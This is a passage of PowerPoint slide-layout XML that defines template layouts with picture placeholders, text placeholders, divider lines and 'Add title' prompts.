          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="4237037"/>
            <a:ext cx="3487071" cy="1892300"/>
          </a:xfr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US" sz="1400" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="14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19" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{218343B1-3037-4A12-A5BE-29EE5D3DC7A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284202" y="1449389"/>
            <a:ext cx="3487080" cy="2167912"/>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21" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EBB779D-72A9-43C7-80DD-51EEA55402CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284202" y="3617300"/>
            <a:ext cx="3487080"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
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA13352E-CE27-4FF2-91C6-83FA875FE862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284204" y="4237037"/>
            <a:ext cx="3487071" cy="1892300"/>
          </a:xfr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US" sz="1400" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="14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28" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2D43E59-8578-4A9A-A0D9-5CABF288D6ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209631" y="1449389"/>
            <a:ext cx="3487080" cy="2167912"/>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29" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F1C555E-6E78-49F5-9389-58DCDEA69B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209631" y="3617300"/>
            <a:ext cx="3487080"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
        <p:nvSpPr>
          <p:cNvPr id="30" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F98BFE0C-8F77-42E9-8B1A-D00DC6B6BD8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="20" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209632" y="4237037"/>
            <a:ext cx="3487071" cy="1892300"/>
          </a:xfr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US" sz="1400" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="14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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218745526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3 pics &amp; titles with text &amp; dividing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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Connector 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DFD8DC6-333F-4D12-B2B1-E0CC8E63A54F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7990456" y="1449388"/>
            <a:ext cx="0" cy="4679949"/>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B1D0B4F-4C26-470A-9E53-C4AAD8791734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4065028" y="1449388"/>
            <a:ext cx="0" cy="4679949"/>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14" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{910E507C-AAE6-4FED-AC4E-A73D986154BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="1449387"/>
            <a:ext cx="3487080" cy="1859441"/>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15" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C635C1B9-56DB-4822-8BE1-1B71F05D39B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="3308828"/>
            <a:ext cx="3487080"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
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C294BD5C-A104-49D3-B85B-71FA3DCD71ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="4433923"/>
            <a:ext cx="3487071" cy="1695413"/>
          </a:xfr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US" sz="1400" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="14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19" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{218343B1-3037-4A12-A5BE-29EE5D3DC7A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="15" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284202" y="1449387"/>
            <a:ext cx="3487080" cy="1859441"/>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21" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4EBB779D-72A9-43C7-80DD-51EEA55402CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="16" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284202" y="3308828"/>
            <a:ext cx="3487080"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
        <p:nvSpPr>
          <p:cNvPr id="28" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2D43E59-8578-4A9A-A0D9-5CABF288D6ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209631" y="1449387"/>
            <a:ext cx="3487080" cy="1859441"/>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29" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F1C555E-6E78-49F5-9389-58DCDEA69B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="19" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209631" y="3308828"/>
            <a:ext cx="3487080"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
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42413540-D425-4896-8C8F-BB48A601BBF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358775" y="3994666"/>
            <a:ext cx="3487071" cy="323946"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F4624C7-390D-4449-BA41-775C5C594491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284202" y="4433923"/>
            <a:ext cx="3487071" cy="1695413"/>
          </a:xfr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US" sz="1400" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="14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18" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366F731F-FCB4-4E7A-9C39-64619AD5CA80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284202" y="3994666"/>
            <a:ext cx="3487071" cy="323946"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C028B7D4-141B-4249-829E-BD19C7CA232E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209631" y="4433923"/>
            <a:ext cx="3487071" cy="1695413"/>
          </a:xfr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US" sz="1400" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="14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23" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B38AE04-7720-43DB-9E97-01E1E2F10F52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="25" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8209631" y="3994666"/>
            <a:ext cx="3487071" cy="323946"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="428268039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2 pics &amp; titles with text &amp; dividing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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Connector 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B1D0B4F-4C26-470A-9E53-C4AAD8791734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6022710" y="1449388"/>
            <a:ext cx="0" cy="4679949"/>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14" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{910E507C-AAE6-4FED-AC4E-A73D986154BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358773" y="1449387"/>
            <a:ext cx="5328592" cy="1859441"/>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15" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C635C1B9-56DB-4822-8BE1-1B71F05D39B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358773" y="3308828"/>
            <a:ext cx="5328592"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
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C294BD5C-A104-49D3-B85B-71FA3DCD71ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="4433923"/>
            <a:ext cx="5328579" cy="1695413"/>
          </a:xfr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US" sz="1400" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="14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16" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42413540-D425-4896-8C8F-BB48A601BBF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="358774" y="3994666"/>
            <a:ext cx="5328579" cy="323946"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-US" smtClean="0">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr lang="en-GB">
                <a:latin typeface="+mj-lt"/>
              </a:defRPr>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Add title</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Picture Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BCE871C-67DF-40E4-8C58-AD24E23D7BC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6369071" y="1449387"/>
            <a:ext cx="5328592" cy="1859441"/>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35" name="Text Placeholder 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18BB8E70-12E9-4307-A0DF-7FE0646BCD92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="23" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6369071" y="3308828"/>
            <a:ext cx="5328592"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
        <p:nvSpPr>
          <p:cNvPr id="36" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19811ED1-7222-4F49-8019-F2AE74AE56A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6369072" y="4433923"/>
            <a:ext cx="5328579" cy="1695413"/>
          </a:xfr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US" sz="1400" dirty="0" smtClean="0"/>
            </a:lvl4pPr>
            <a:lvl5pPr>
              <a:defRPr lang="en-GB" sz="14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37" name="Text Placeholder 3">
            <a:extLst>
